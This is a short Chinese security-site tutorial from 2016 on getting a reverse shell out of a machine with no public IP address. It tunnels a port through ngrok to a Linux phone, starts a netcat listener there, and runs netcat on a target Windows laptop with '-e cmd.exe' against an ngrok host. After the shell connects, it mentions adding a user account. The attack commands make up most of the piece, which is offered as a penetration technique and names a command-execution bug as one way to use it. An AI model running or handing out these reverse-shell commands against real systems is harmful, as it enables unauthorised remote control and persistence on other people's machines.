栏目导航: 首页 > 检测提权 > 提权渗透 > 内容

反弹shell技巧之内网反弹到内网(不需要公网ip)

www.hx99.net    时间: 2016-11-16    阅读: 次     整理: 华西安全网

 

渗透中很多时候我们都要用到反弹shell,比如说最经的ImageMagick命令执行漏洞。

反弹shell的条件就是要有一个公网ip,但是很多时候我能都没有公网ip的。。比如在手机上搭建的linux,比如在校园网环境。。。。

实验环境:

1.一台内网windows 笔记本(目标)

2.一台搭建好linux环境的手机(控制)

目的就是 在没有没有公网ip的环境下实现反弹笔记本的cmdshell到手机搭建的linux

用到工具:

Ngrok 内网穿透神器

官网地址为:https://ngrok.com/

附上一张官网截图

火狐截图_2016-05-31T03-15-31.578Z

我们只需要下载对应的版本即可,我这里是手机搭建的linux 所以下载 linux arm的

下载后 

      unzip /path/to/ngrok.zip   ##解压下载的压缩包,

     解压后当前目录会多出一个ngrok文件,  前面加./运行即可

     遇到没有权限 chmod +x ngrok  即可

 

下载完成后到ngrok官网注册一个账号,注册后会出现下图界面

222

复制上图打码区域的./ngrok authtoken aTks************************izWm3qE

到你的ngrok目录执行一下即可

完成就可以 执行

./ngrok tcp 9999    获得一个公网地址,如下图

222

ngrok 是不能后台运行的,所以我们要借助screen(用法百度)实现后台运行,

手机linux上开一个新窗口执行:

nc  -vv -l -p 9999 

然后目标机器(内网的windos笔记本)执行

nc.exe -vv 0.tcp.ngrok.io 18196 -e c:\Windows\System32\cmd.exe  
 0.tcp.ngrok.io 18196  为刚才利用ngrok 得到的公网地址,如下图

333

这时候手机已经反弹回来一个cmdshell了,下图红色区域

666

 

添加用户

360截图20160611181346726

 

仅提供思路~

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭